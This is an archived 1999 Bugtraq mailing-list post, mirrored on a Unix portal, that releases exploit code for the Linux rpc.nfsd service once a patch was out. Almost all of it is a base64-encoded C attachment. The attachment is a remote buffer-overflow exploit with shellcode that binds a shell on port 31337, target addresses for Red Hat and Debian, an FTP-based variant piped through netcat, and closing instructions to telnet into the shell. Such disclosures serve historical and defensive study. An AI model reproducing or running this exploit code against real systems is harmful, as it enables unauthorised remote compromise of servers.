BSD, Linux, Cisco, Web, Palm, other unix RUSSIAN version Search:  Новость: Установка sendamil с SMTP-авторизацией и проверкой на вирусы под FreeBSD SOFT - Unix Software catalog LINKS - Unix resources TOPIC - Articles from usenet DOCUMENTATION - Unix guides News | Tips | MAN | Forum | BUGs | LastSoft | Keywords | BOOKS (selected) | Linux HowTo | FAQ Archive

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Date: Wed, 10 Nov 1999 19:42:43 +0100
From: Mariusz Marcinkiewicz <tmogg@ZIGZAG.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: rpc.nfsd exploit code

  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mime@docserver.cac.washington.edu for more info.

--1958937888-1199299929-942259363=:15745
Content-Type: TEXT/PLAIN; charset=US-ASCII



hi,
patch was published so i can send you exploit code

best regards,
	tmoggie

__
Mariusz Marcinkiewicz | phone: +48 601 080 286 | mail: many@rast.lodz.pdi.net
System Administrator && Tech Support  <tmogg@zigzag.pl>  http://www.zigzag.pl
Security Advisor [*] tmogg@hert.org || tmogg@hack.dk  [*] http://www.hert.org

--1958937888-1199299929-942259363=:15745
Content-Type: TEXT/x-csrc; name="3nfsd2.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.20.9911101942430.15745@mail.zigzag.pl>
Content-Description:
Content-Disposition: attachment; filename="3nfsd2.c"

LyoNCiAqIHJwYy5uZnNkMiBleHBsb2l0IGZvciBMaW51eCANCiAqDQogKiB0
b2RheSBpcyA0LzA3Lzk5ICgzIG1vbnRocyBhZnRlciAxc3QgdmVyc2lvbjsp
DQogKiANCiAqIGNoYW5nZXMgaW4gdi4yOg0KICogVGhhdCB2ZXJzaW9uIGNh
biBiZSB1c2VkIGZvciBGVUxMIHJlbW90ZSBleHBsb2l0aW5nLCBJIGNoYW5n
ZWQvYWRkZWQNCiAqIHR3byBpbXBvcnRhbnQgdGhpbmdzOg0KICogCQktIG5l
dyBzaGVsbGNvZGU6IHNoIG9uIGRlZmluZWQgcG9ydA0KICogCQktIGNyZWF0
aW5nIGRpcnMgdmlhIGZ0cA0KICogTm93IHlvdSBjYW4gaGFjayBib3ggcmVt
b3RlbHkgaWYgeW91IGhhdmUgK3cgdmlhIGZ0cC4gDQogKiAoLi8zbmZzZDIg
LWUgL2hvbWUvZnRwL2luY29taW5nIC1mIC9pbmNvbWluZykgfCBuYyB0YXJn
ZXQgMjENCiAqICANCiAqIGF1dGhvcjogdG1vZ2dpZQ0KICogZ3JlZXR6OiAN
CiAqICAgICAgICAgRGlHaVQgICAgICAtIGJ1ZyANCiAqICAgICAgICAgbWF4
aXUgICAgICAtIGhlbHAgd2l0aCBzaGVsbGNvZGUgDQogKiAgICAgICAgIGxh
bTNyWiBHclAgLSA6KQ0KICogICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgDQogKi8gIA0KDQojaW5jbHVkZSA8c3lzL3N0YXQuaD4NCiNpbmNs
dWRlIDxzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1
ZGUgPGZjbnRsLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8
c3RyaW5nLmg+DQoNCiNkZWZpbmUgZ3JlZW4gIlxFWzMybSINCiNkZWZpbmUg
Ym9sZCAiXEVbMW0iDQojZGVmaW5lIG5vcm1hbCAiXEVbbSINCiNkZWZpbmUg
cmVkICJcRVszMW0iDQoNCg0KY2hhciBzaGVsbFsyNTVdID0NCiAiXHhlYlx4
NzBceDMxXHhjOVx4MzFceGRiXHgzMVx4YzBceGIwXHg0Nlx4Y2RceDgwXHg1
ZVx4ODNceGM2XHgwZlx4ODlceDQ2Ig0KICJceDEwXHg4OVx4NDZceDE0XHg4
OVx4NDZceDE4XHhiMFx4MDJceDg5XHgwNlx4ODlceDQ2XHgwY1x4YjBceDA2
XHg4OVx4NDYiDQogIlx4MDhceDMxXHhjMFx4ZmVceGMzXHg4OVx4NWVceDA0
XHhiMFx4NjZceDg5XHhmMVx4Y2RceDgwXHg4OVx4MDZceGIwXHgzMCINCiAi
XHgzMVx4ZGJceDMxXHhjOVx4YjNceDBlXHhmZVx4YzFceGNkXHg4MFx4NjZc
eGI4XHg2OVx4N2FceDg2XHhjNFx4NjZceDg5Ig0KICJceDQ2XHgwZVx4OGRc
eDQ2XHgwY1x4ODlceDQ2XHgwNFx4MzFceGMwXHhiMFx4MTBceDg5XHg0Nlx4
MDhceGIwXHg2Nlx4MzEiDQogIlx4ZGJceGIzXHgwMlx4ODlceGYxXHhjZFx4
ODBceDMxXHhjMFx4ZmVceGMwXHg4OVx4NDZceDA0XHhiMFx4NjZceGIzXHgw
NCINCiAiXHg4OVx4ZjFceGNkXHg4MFx4ZWJceDA0XHhlYlx4NjBceGViXHg4
Y1x4ODlceDQ2XHgwY1x4OGRceDQ2XHgwY1x4ODlceDQ2Ig0KICJceDA0XHg4
OVx4NDZceDA4XHhjNlx4NDZceDBjXHgxMFx4MzFceGMwXHhiMFx4NjZceDMx
XHhkYlx4YjNceDA1XHg4OVx4ZjEiDQogIlx4Y2RceDgwXHg4M1x4ZWVceDBm
XHg4OVx4YzNceDMxXHhjOVx4ODlceDRlXHgxNFx4YjBceDNmXHhjZFx4ODBc
eDQxXHhiMCINCiAiXHgzZlx4Y2RceDgwXHg0MVx4YjBceDNmXHhjZFx4ODBc
eGZlXHgwNlx4ZmVceDQ2XHgwNFx4ODhceDY2XHgwN1x4ODhceDY2Ig0KICJc
eDBiXHg4OVx4NzZceDBjXHg4ZFx4NDZceDA5XHg4OVx4NDZceDEwXHgzMVx4
YzBceGIwXHgwYlx4ODlceGYzXHg4ZFx4NGUiDQogIlx4MGNceDhkXHg1Nlx4
MTBceGNkXHg4MFx4MzFceGRiXHg4OVx4ZDhceGZlXHhjMFx4Y2RceDgwXHhl
OFx4OWJceGZmXHhmZiI7DQpjaGFyIG5leHRbXSA9ICJceGZmXHgyZVx4NjJc
eDY5XHg2ZVx4MmVceDczXHg2OFx4NDFceDQxXHgyZFx4NjkiOw0KY2hhciBt
YXJrW10gPSAiXHhmZlx4ZmZceGZmIjsNCiANCmludCBwb3J0ID0gMzEzMzc7
DQppbnQgb2Zmc2V0Ow0KDQoNCnZvaWQgdXNhZ2UoY2hhciAqcHJvZykgew0K
IHByaW50ZigiXG51c2FnZTogJXMgPC1lIGRpcj4gWy10IHRhcmdldF0gWy1z
IHBvcnRdICINCiAgICAgICAgIlstZiBkaXJdIFstdSB1c2VyXSBbLXAgcGFz
c11cblxuIixwcm9nKTsNCiBwcmludGYoIiAgIC1lIGRpcgk6IHJlYWwtcGF0
aCB0byBleHBvcnRlZCBkaXJlZWN0b3J5XG4iKTsNCiBwcmludGYoIiAgIC10
IHRhcmdldAk6IHRhcmdldCBPU1xuICIpOw0KIHByaW50ZigiCSAgMSAJCS0g
UkggNS4yIChkZWZhdWx0KSBcbiIgICANCiAgICAgICAgIgkgIDIgCQktIERl
YmlhbiAyLjFcbiIpOw0KIHByaW50ZigiICAgLXMgcG9ydAk6IHNoZWxsIHBv
cnQsIGRlZmF1bHQgaXMgMzEzMzdcbiIpOw0KIHByaW50ZigiICAgLWYgZGly
IAk6IGZ0cC1wYXRoIHRvIGV4cG9ydGVkIGRpcmVjdG9yeVxuIik7DQogcHJp
bnRmKCIgICAtdQkJOiBmdHAgdXNlcm5hbWUgKGRlZmF1bHQgaXMgZnRwKVxu
Iik7DQogcHJpbnRmKCIgICAtcAkJOiBmdHAgcGFzc3dvcmQgKGRlZmF1bHQg
aXMgZnRwQGZ0cC5vcmdcblxuIik7DQogZXhpdCgwKTsNCn0NCg0KDQp2b2lk
IG1haW4oaW50IGFyZ2MsIGNoYXIgKiphcmd2KSB7DQogaW50IGksajsNCiBp
bnQgZnRwPTA7DQogY2hhciB1c2VyWzI1NV09ImZ0cCI7DQogY2hhciBwYXNz
WzI1NV09ImZ0cEBmdHAub3JnIjsNCiBjaGFyIGJ1Zls0MDk2XTsNCiBjaGFy
IGJ1ZjJbNDA5Nl07DQogY2hhciB0bXBbNDA5Nl07DQogY2hhciB0bXAyWzQw
OTZdOw0KIGNoYXIgZXhwWzI1NV0gPSAiISI7DQogY2hhciBleHAyWzI1NV09
ICIhIjsNCiBjaGFyIGFkZHJbXSA9ICJceDA2XHhmNlx4ZmZceGZmXHhiZiI7
IA0KIA0KICANCiB3aGlsZSAoMSkgew0KICBpID0gZ2V0b3B0KGFyZ2MsYXJn
diwidDplOnM6Zjp1OnA6Iik7DQogIGlmIChpID09IC0xKSBicmVhazsNCiAg
c3dpdGNoIChpKSB7DQogICBjYXNlICdlJzogc3RyY3B5KGV4cCxvcHRhcmcp
OyBicmVhazsNCiAgIGNhc2UgJ3MnOiBwb3J0ID0gb3B0YXJnOyBicmVhazsN
CiAgIGNhc2UgJ2YnOiBzdHJjcHkoZXhwMixvcHRhcmcpOyBmdHAgPSAxOyBi
cmVhazsNCiAgIGNhc2UgJ3UnOiBzdHJjcHkodXNlcixvcHRhcmcpOyBicmVh
azsNCiAgIGNhc2UgJ3AnOiBzdHJjcHkocGFzcyxvcHRhcmcpOyBicmVhazsN
CiAgIGNhc2UgJ3QnOiBzd2l0Y2ggKGo9YXRvaShvcHRhcmcpKSB7DQogICAg
ICAgICAgICAgICAgICAgICBjYXNlIDE6IHN0cmNweShhZGRyLCJceDA2XHhm
Nlx4ZmZceGZmXHhiZiIpOyANCiAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgYnJlYWs7IC8vIGRlYmlhbiAxLjINCiAgICAgICAgICAgICAgICAgICAg
IGNhc2UgMjogc3RyY3B5KGFkZHIsIlx4MThceGY2XHhmZlx4ZmZceGJmIik7
IA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICBicmVhazsgLy8gcmgg
NS4yDQogICAgICAgICAgICAgICAgICAgfQ0KICAgZGVmYXVsdCA6IHVzYWdl
KGFyZ3ZbMF0pOyBicmVhazsNCiAgfQ0KIH0NCiBpZiAoIXN0cmNtcChleHAs
IiEiKSkgdXNhZ2UoYXJndlswXSk7DQogaWYgKGZ0cCA9PSAxKSB7DQogIC8v
IHNvY2tldHMsIHJlc29sdmUsIGNvbm5lY3QuLi4uLi4NCiB9DQogKigodW5z
aWduZWQgc2hvcnQgKikgKHNoZWxsICsgNjYpKSA9IHBvcnQ7IA0KIA0KIG9m
ZnNldCA9IHN0cmxlbihleHApOw0KIGlmIChleHBbb2Zmc2V0LTFdICE9ICcv
Jykgc3RyY2F0KGV4cCwiLyIpOw0KIG9mZnNldCA9IHN0cmxlbihleHApOw0K
IC8vIDFzdCBkaXJlY3RvcnkNCiBiemVybyhidWYsc2l6ZW9mKGJ1ZikpOw0K
IG1lbXNldCh0bXAsJ0EnLDI1NSk7DQogdG1wWzI1NV09Jy8nOw0KIHRtcFsy
NTZdPSdcMCc7DQogc3RybmNweShidWYsZXhwLG9mZnNldCk7DQogLy8gbWFr
ZSBvdXIgZGlycw0KIGlmIChmdHAgPT0gMSkgew0KICBwcmludGYoIlVTRVIg
JXNcbiIsdXNlcik7DQogIHByaW50ZigiUEFTUyAlc1xuIixwYXNzKTsNCiAg
cHJpbnRmKCJDV0QgJXNcbiIsZXhwMik7DQogfQ0KIGZvciAoaT0xO2k8PTM7
aSsrKSB7IA0KICBzdHJuY2F0KGJ1Zix0bXAsc3RybGVuKHRtcCkpOyAgDQog
IGlmIChmdHAgIT0gMSkgew0KICAgaWYgKG1rZGlyKGJ1ZiwwNzc3KSA8IDAp
IHsNCiAgICBwcmludGYocmVkIi4uLmZ1Y2shIGNhbid0IGNyZWF0ZSBkaXJl
Y3RvcnkhISEgOiAlZFxuJXNcbiJub3JtYWwsaSxidWYpOw0KICAgIGV4aXQo
LTEpOw0KICAgfSANCiAgfSBlbHNlIHsNCiAgIHRtcFsyNTVdPSdcMCc7DQog
ICBwcmludGYoIk1LRCAlc1xuIix0bXApOw0KICAgcHJpbnRmKCJDV0QgJXNc
biIsdG1wKTsNCiAgfQ0KIH0gICANCiAvLyBvZmZzZXQgZGlyZWNvcnksIGxl
bmd0aCBkZXBlbmRzIG9uIHJlYWwtcGF0aA0KIG1lbXNldCh0bXAsJ0EnLDI1
NSk7DQogdG1wWzI1NS1vZmZzZXRdPScvJzsNCiB0bXBbMjU2LW9mZnNldF09
J1wwJzsNCiBzdHJuY2F0KGJ1Zix0bXAsc3RybGVuKHRtcCkpOw0KIGlmIChm
dHAgIT0gMSkgew0KICBpZiAobWtkaXIoYnVmLDA3NzcpIDwgMCkgew0KICAg
cHJpbnRmKHJlZCIuLi5mdXFuIG9mZnNldCBkaXJXIyQjQCUjJF4lVCNcbiJu
b3JtYWwpOw0KICAgZXhpdCgtMSk7DQogIH0NCiB9IGVsc2Ugew0KICB0bXBb
MjU1LW9mZnNldF09J1wwJzsNCiAgcHJpbnRmKCJNS0QgJXNcbiIsdG1wKTsN
CiAgcHJpbnRmKCJDV0QgJXNcbiIsdG1wKTsNCiB9DQogLy8gc2hlbGwgZGly
ZWN0b3J5IA0KIG1lbXNldCh0bXAsJ3gnLDI1NSk7DQogLy8gcHJpbnRmKCIl
ZFxuIiwgc3RybGVuKHNoZWxsKSk7DQogaWYgKGZ0cCA9PSAxKSBzdHJuY2F0
KHNoZWxsLG1hcmssc3RybGVuKG1hcmspKTsNCiAvLyBwcmludGYoIiVkXG4i
LCBzdHJsZW4oc2hlbGwpKTsNCiBzdHJuY2F0KHNoZWxsLG5leHQsc3RybGVu
KG5leHQpKTsNCiBpZiAoZnRwID09IDEpIGk9MzsgZWxzZSBpPTA7DQogc3Ry
Y3B5KHRtcCsoMjU1K2ktc3RybGVuKHNoZWxsKSksc2hlbGwpOyANCiAvLyBw
cmludGYoIiVkXG4iLCBzdHJsZW4oc2hlbGwpKTsNCiBzdHJuY2F0KGJ1Zix0
bXAsc3RybGVuKHRtcCkpOw0KIHN0cm5jYXQoYnVmLCIvIixzdHJsZW4oIi8i
KSk7DQogaWYgKGZ0cCAhPSAxKSB7DQogIGlmIChta2RpcihidWYsMDc3Nykg
PCAwKSB7DQogICBwcmludGYocmVkIi4uLmZ1Y2shQCMgc2hlbGwtZGlyXG4l
c1xuIm5vcm1hbCwgYnVmKTsNCiAgIGV4aXQoLTEpOw0KICB9DQogfSBlbHNl
IHsNCiAgdG1wWzI1OF09J1wwJzsNCiAgcHJpbnRmKCJNS0QgJXNcbiIsdG1w
KTsNCiAgcHJpbnRmKCJDV0QgJXNcbiIsdG1wKTsNCiB9DQogLy8gYWRkciBk
aXJlY290cnkgIA0KIG1lbXNldCh0bXAsJ2EnLDI1NSk7DQogdG1wWzk3XSA9
ICdcMCc7IA0KLy8gICooKGludCopKHRtcCs5MykpID0gYWRkcjsNCi8vIGlm
IChmdHAgIT0gMSkgKigoaW50KikodG1wKzkzKSkgPSAweGJmZmZmNjA2OyAv
LyBkZWJpYW4gMi4xDQovLyBlbHNlIHsNCiAgc3RyY3B5KHRtcCs5MyxhZGRy
KTsNCi8vIH0NCiBzdHJuY2F0KGJ1Zix0bXAsc3RybGVuKHRtcCkpOw0KIGlm
IChmdHAgIT0gMSkgew0KICBpZiAobWtkaXIoYnVmLDA3NzcpIDwgMCkgewkg
IA0KICAgcHJpbnRmKHJlZCIuLi5mdWNrIUAjIUAjISQgYWRkcmV6LWRpciBe
XG4lc1xuIm5vcm1hbCwgYnVmKTsNCiAgIGV4aXQoLTEpOw0KICB9DQogfSBl
bHNlIHsNCiAgcHJpbnRmKCJNS0QgJXNcbiIsdG1wKTsNCiAgcHJpbnRmKCJx
dWl0XG4iLHRtcCk7DQogfQ0KIGZwcmludGYoc3RkZXJyLG5vcm1hbCBncmVl
biJPa1xuIm5vcm1hbCk7DQogZnByaW50ZihzdGRlcnIsIm5vdyB5b3UgaGF2
ZSB0byBkbzogImJvbGQgZ3JlZW4gXA0KCSAicm0gLXJmIC9wYXRoLXRvLW1v
dW50LXBvaW50L0FbdGFiXSAmIFxuIg0KICAgICAgICAgImFuZDogdGVsbmV0
IHRhcmdldCAlZFxuXG4ibm9ybWFsLHBvcnQpOw0KfQ0K
--1958937888-1199299929-942259363=:15745--

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Быстрая навигация по сайту __________________ КАТАЛОГИ: Каталог программного обеспечения Каталог ссылок на unix ресурсы Каталог тематических статей Архив документации Советы, заметки MAN - Системные руководства __________________ НОВОСТИ: Новости OpenNews LastSoft - Свежий софт Обзоры ПО с freshmeat Проблемы безопасности Новости с других сайтов __________________ ОБЩЕНИЕ: Форум/Конферения _______________ МИНИ-ПОРТАЛЫ: CISCO.opennet.ru BSD.opennet.ru LINUX.opennet.ru SOLARIS.opennet.ru WEB.opennet.ru - web-технологии SECURITY.opennet.ru PALM.opennet.ru - карманные ПК __________________ НАВИГАЦИЯ: Навигация по ключевым словам Системы ПОИСКА __________________ РАЗНОЕ: ЦУП - Центр Управления Проектом Добавление в каталоги Закладки Добавить в закладки Created 1996-2003 by Maxim Chirkov   Добавить, Реклама, Вебмастеру, ЦУП, ГИД